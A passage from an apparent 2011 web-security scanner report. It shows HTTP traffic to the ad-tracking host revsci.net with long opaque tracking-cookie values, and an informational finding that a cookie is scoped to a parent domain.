xG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_oSH1="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMKplM1SF6IV/GkJe9hFn373PXtGYjJWUWg8IjB3Yl514E3J4uXftdqpxOzsrbA6vCRMDOAP39VqMDNGw9XQbjrptRUQu1WfIuuYwo0l2O0tLSjL6GKJDMSomBnLjVzRQN7ocv/wqjjZ0mY82YC1rmbM45cBkQBSn3NtFyXhLIIevvbHizz9P/e3XQLwn3Lss4bUjNcm/zD5FISMr6EthRBkWZ7p66Yh6xODm9WJXmKZb6TA29rCZQ9Qs/1UMNnZ5FdHB4MabFE0O2DqVD9S46VKVWyNPYSTjdkMVnao8UplaR2b5/ZyExhaAzAvuxYENdDmTwCvispoDeEv0oWQC3W5zQKbUt1vnZDrX0k3vwsgIZLJOUb63Pf/8fETMblqeA6R5Ko4RqeUWaCv8SijGnEpuUuWzvrlRD+mb2Y2oS2xt01QEL5WHElGRiWlkoQ7HQA+Iukelu60dSPOeAi7KaZA7qiBDtrthVi6ecAmr09jpgrbwnIQ5/KU+Ns1qHJ47zfYwk8Gfedh0bEfonNNJLUYEjTtXBOVbQxuEojm0n8mhQjTegWqmedstb2rI9HZET1rWj4ULDJ3UMOG503BBTG/H+ricN8DtrGq6HhICSOIU2ry/BYp/5eZ5h7nrfZscmyIDZmcYYL9JQt44vRk2so/JPCmp088MWu/ZHB1QDqriWyI5ShC0uUrNE8NysEGtaocAdKZwjlIBIgstNh7KYUT6AE0bvYq25PWoavIrW1NkfyinIe9mVHAIYTQZNkAmNLj50E94AGCQNK8Ict4pt7fB7Trgtkw1Dh3KnSXcvOC3MhYadLkcMW/aZMkurygiB1UO7l0C+DjE+hgzO8FRDxSMU+qU5xRwG0TUVsdzQ3piwMAaLu9DhaV/q9Yir7zF4vSrz38MvZKtGi5QGIQRqQQWd7VpTieu2pgQud/BeND/PDOTMYY78vNlFT/kBls6LdmjS8cyPliJK1CLZaezlTWAQ8OxslgD4pSxtZeUyOs/k6Aps/h7H+vccU+K5AnoSLckBiYE2tUsfsTXTmPQzYBG79TJ3kI688XNT+4YkIsDKcAv+tmF5uVWy6h92Y0RrLS1oKLLd1ccFcvsp5HVsg+AhJ35cZU99r9HtFhicRNDWfxramhMjWdLFf3EneyZPwSyAC/pZQmWoS3rqh7Yb/wkPcwUjVHEi4EErYapJ65tXZXqdShYk9IULXN7cwJZRdBsvGAmY13R6MclBXN1XGuPMqg145Pq8KvKziF8PzcPdW6rkfSJnrASwYjNyLFRUbK0ccTeB39zKLQfkpd1vXi6XRQ=="; rsi_us_1000000="pUM14zlDOBYUrmdq3jOQHqNG/UTjJLypNPMu8j89fd7oQaFd0CGE6g8BwU8BLTkNk43VN7eq0QNSl76DAxjTpflyEJqHSNwDaYKMVCh7XgEfDNWVPxbs35sa/xj/vElNR/+gIIggPgBnub3IEnxqnqAOg/x6o5ej+FfHlVkcCCFyLldk48HYmeuowpPexbqywuCCSPNIp2J6hOg63R1xwypuZNmFyWtkaAJOLFC96vu3DypVpoMTvglvTFd++k4S2nEADwSVv/y4rCnyA2k/8xw0gi7gng1Nxoy/u7GrI/CfQ75OV72/TQ7HL9RQ9zCgCXpraRqdG/HC8vs5xD17nsay3TAwV06tjh5B1iJIqLswHKC81UJAly5Hq1kFo3jfmFSpyRcqZNVuGllSKdhUb9SWdtYGta6i5A/8bj2rwoos2OD59uNt8slVP4IfYVSog4hQir2d/Zb6M0UDkbt0aFKjvK3TzjQnEjvJmB91AT5154r859yhIfeuEiWunv+YfXefziBYxT0O8FIbdf1EfwxZM2pM75oRMn6iYm6A8tirhW5mfI0q55UmHc10bzIr451U40/F4ndOQJ5VIKBXIRvcjsx6Q3skK6gc3T1nSALaQD2TRiWIKuIZlIgHEytdP25boLHLTj/fwqumCqy+qGC3uzzNBVkvOlkVKnkZWQ8fyM70hMblQZQgojMHb5TIFWROVzb9oaKh4p7gs9EPqlVEGVNA+nfwMG0TPmpf5kxbcC6/nZPGPmsodh+mSrL3bo8Xxsm4PoEI1u/R6igCjdXVtz02txdBfDckKL3EXPOjMnokfT2E6BajpUpCoLABEjAu4vD7Cp+oc8WGkHBE7WMDOg59tIqMzFj+IBdIAbHFQZC+1GYkYUgRgbLL2DSFWWaOogiHEWn8h7n9/t0SqlsnOjQR7Fuc/5WIDt+avFJIbFoiYFaOoTUWhJWvo14tFIeLxo9rxWTomHspbz3Buareqwl/MNFDDUu+TyTSwyGKK2xe1XROWhN7nkSuqWBIG96FttjBeKKvQDQrDY+GeEp2OyKTUsAFWrUqGkDBRMmWeIjj9H4yqfPcNj6qBnkyb8UKeiP7uKf4lux1Gq4oC9WqCfYyXfJ8/EZ7gOdAANDHlg5ubFME9PEGFH6TxwbJ/7idSdzkRnAty+F34UAcpEAu9gUoDCOxR7i0HEVYFtdYEgaXS+9xpGjLBdkO/Dtb0kfMsE6559lsjcyC5axZ4/zCIADWgdZ3N5QPbye66yakOhv9YlTcRw8aAi8s/czgliIGrbz1y0uq2RiD1SB3+LUVxkVKNJ1vyMX5UIUrTQWZTvOINCDFIepwdARLIrxcMTHRQQGt8MoqZIPvPWX9Z9GG+QKDDb9IjMc+BclyeC7XEatsFvLGNv0pit7N1tYjktpkXRwpHRz4VLpWEWbI+1NVtdAdp0P1BwVzDhtOIeXhYu9Ybk2/aNRyvvxhNIAk1zwK6JqDih0huyq8Ec85LkcvbuzFIr6b9LdbwNVcnJ+kjy9US/Wi0yY2gIYUSBAtLARJHsjOg+d33fXh6o8D8drqU34L8pVv5XXgu7D02e04on4qoT0N0WU/tt1w1QI2E74Ab2l3BCZfw+qqzDh7yZufp+rRLzh3Ju9qzb7Fk6JjrG/PEgURmkX7i/JmBs/N4q5uSLvLTTe+cADuYiiLZkbYRI3t4YdeKx32Dfyed4OTkdVk1eSNt+41XERKrQMwKXsfshOGNAI9FxeWdib1/RYqZ1ei/w5LvwJuMdNOLE5caPK90Dbjvlhiu7Fd60dr5Qo="; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vIheCK3a3RumjiC3vPwuMZAxXyjBy0X/EZGDDHvWZWowFYW/Bxx4we1JcTYCDgM2botNJqnSwTH9pyodmvemDFAmncfTiCduisVHWMvP2FVuAmRIkN4sV/1/nbWOa1aBtwuwWswl2zUSS2WYoesQ3NdJqkgWM3X0D6OLqEYHLTHcilfo0L+NbCaF9s7KVR1qoGVxzkUB68pbRhaO5NQ/6xk587qz6i6ZqGG6s7mt3ux+euNMOthetarg55J1GgGo0z+AqYCKx77wOIpIiPnAipsz4Z6b2qsImVErhovvfXok1Y4bGwabV2HAzES7hMbIMbgW+TZbvPRHsqX8HVGXzlULnOAJfy5eUE0+VEf/mb9SmmcN1fNKpXf0YpfFaieFqCmynEkM9QFDUJNrcg5PF1DNV6aayxOFEyE82ca6Z6pn2pNfg88hXw4VhNNM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zOTH7bra64O1NHCyUIakKPhhyXtHbCSJbb2/JiEU9rR8N/1SuCaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTf/VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkN9X0yXpPm8m7PF1sT21QfNHLUnt/14AzpDXja0EmmRg/5YgysdNN4=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:45:58 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:45:57 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.176. http://pix04.revsci.net/I10985/b3/0/3/1008211/663059389.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/663059389.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EmhOXMQT7uItGF29/yo/tk8g7ZPQl+KT2sir9n5vw/ZUuJEqMB5SuHqPlIcMQ/wuGtIXDFi7gHtANUTDlM7WrYc77BvNkkm74YZr8vsOzTjWu1IMaklfrCIvnqjtBazo57KAavAGCJWMeY7+nWQvQPde28mCn8HVj3wn/LteM4fXqdP4oPyTwkuJUiBNLlwyKp1uPd5XVWarPuN9DSmpqdU4I3hB7P2eDvpimyKAvlNhKtgXGmh1fNzUoL4L0qR8Xev7sNOxpR8TSJvfdASryikRKuIoV0pjLiqzEC1DsFT+Q03yVLUiSLNxx9TAzykG9l+BdQSqPmBBY8gWAHs5T+Z13QbK7ZUBU0KP7gq6C6QZabQ+rvxFb2rH3na9vVIFbioRxyqw+0AKCF3TCDwjoxqYNq3VBnZgtZoSK4iN8fzUSwLvbl4vGB24IZl41PfE4CbO7AMULxN88ioWVIDRzO+Ze/xcH3C46oyYxPJ+Rd6m33NVOj7vqpyfyQt1UUcFhDJ25JsjzaLaFAl8uGNuMal0lzdhOVSJXxNN+bF8NI8ER6MvpozFI5xB3c3MQ2j06MLFF2iH3yy2K4flU8hwz7GxuYksxHzRPwya+5JxxiMFGcTphU5Tgkbwiw8s3afVem+k70CyER2yK2zXjhO; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:49:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/663059389.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_XdPG="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJyQjwMnAdkOJUOWioJheIF3Jk6cqhUkQ10c6/quMDdaJpq/vnMjbw+g/R2bT9OTHEbPpAEzz4hupRmr2CSQa7wV1rw+pjpd5Yvz1he4g3tXf6Dn2kcTf8NUdW4QCI19QBF4Cn59AySmLYxacD/rkh3JhANJ8cLNNK/bnI+P/LA6emrxH3x9lzQsgxUwPwnVZiyIDfRiye20N0+NiSRUiY2gTwsh9mo4+1Veae+kXsPodDKx0j53u1UNn3M716rTkAh7EOJqQjfUCHjLFTowbq3Qa/05x0Yrmwmixafde2Isw4udNKfvYsgpb+mDiVEBRw4prBQ2tRFI1vf70ckVOEuPhFapsCGxfwoew3Z7YBQwHwqMUK4obCvGyANxYl5acoQWOP084S8JcAohObtz6jgCeLpMnaAzFpTqvCYvYfULHUQ36/yd39AWdzEHh2eBw+aZ90eAyzrFJ64nfaSmVpvc0Rz/PDVciI27xi/ZcVuskwnX68GtVP8J65jAyxpV4fcNrqOZ0JPkjwq5sLYpTxer8vJ6HPeVTR3aHvSa+VZ5qCcVK2oDlZopSmE9LGnvoYpd/qENOOAzphAY65lS/qVpUvMmj27rFAO29bvtFgEcSxlG7dw/ihsuVoGakzTlbLqYKvoWrdBnW/Gc7y4BpR90m5iaDZIzL5OhzB0/6PJdH8FXNCRh8uGJG2AXT6ud1lkUQBxWzuWcFiubglVIAWm+4jAYJwfl0CGrVwqMmvhDOqA3ZNv+lQE4AJd17whiCPd/VfkKTSrZWp34nExcRtBHuKkbaSYRUboYkNaENlE1KcBwS5xsA/U3GFINkYXZXYUy5SgUD8eCb6oES7xwmswACRpc96ADNDp3ByLXgBxWZDrOMzgDEJ1XsZu5PZlBwRnswGBAeRgtXeqLZS4OHTA1wU/itSaxYwcQk5KLm9/fVZBbUvUWxTYh7xwL4YFBUdsU1GlynxNnfGH0ESQv2JEkLa2lGakcvpmJBONnT7MdOee0zk5FDvYYzoQCerAHohfTOL5BtEtV0L9G26Ran/L8bdPMNH89L8eDIK3cetLC8TtV83OZqVtOx6a/vAKwjAxnQH8/bxbGpe4uwI359Mj+tZ8rZkJmEDtltHoXfYXmENsfQgPHE6n1ns3MLyuzy2lr6B1rPRK+bbnG5xKFllaC3hrXKVCt3CKBZ7XUnzje5pf1BmRYHCU+kwfE1aS+DBSXBm2VTifFiq0NwamRrPnRt6m1YvEs2UcQop0pIPwVpfLe+nBIqCqOg4c6bbBArL2Ppab62fT8Px1nJZMBwmR8bP8QiNYA1xnTR4nQJBricVgcQp"; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAxBCInYEZ/zMMMxtAxH0lsZ65lpt0Uj9e/FhI5M0TXDoXPqpzJ88AKdLvfI3vGmo36wtwsoJn1n5XEhs3EH+RMmmqZfDlqhbQb5jsGnNEnqAOg/h4o9ej/BfHlVtcGCPyPl+EInxMZLMtiL+/3+fzse9599cFGDwsjxuhywNbJBUBQjy5/iHESIZvQ7Et9LzafcOGMCYV/Ey1/szd0Jgbp7U8D/P2lpCwQ/3SY1chf4YpCM+dmSVtTLT/nu2XlW6l0plKeAVEc48XA5WtJJbNkD7paMqsldpZ8puMz/1lhto2YwAsf9RSwLLUKiE2GqBwyqcexhb+JNa7IryqVaPjZ3eu4oyyh36+MmVvfS/0lYVzLtv6m1iBGpt6bte7k6oAK/ngtjd0sXcnwQs7Z2pZ03IALl27kBJS06XlJE2ge/mMAic5CSelfiVIdvOGTS7zZ2tyDJp/DutlEA9LI/jC9lv7V5pH9JId/ln/LwwwaYhbEWiqL4Qt031EWoZVA75Y4bekYuP9HVeq4pD24e5+pvz65FAkkTVQSAEfOMzzTQuZMePijcWytF5N+xA8wjnH08HT+ufEN/7is8rc9S2VyT4Z/8cTk3WeZetb1GoMoPQx6/LTvHoj+9p8msYoazucpiwzOXgtW6iaWcXwDJmPhQCZIVwIh+809uQV/6YAmQoWZQ3VtyMDuyF2Jl874et9VtWe+ZQElLGJPgi9Sby4K3Q2wmNhABAWGV8QjiLkE4AA2xxdy1rye+OV2IUivmJ0y0hAsMSe31MOmAYive+p2VTxMr61OBelwZQ8B1ByJX3/cKt8L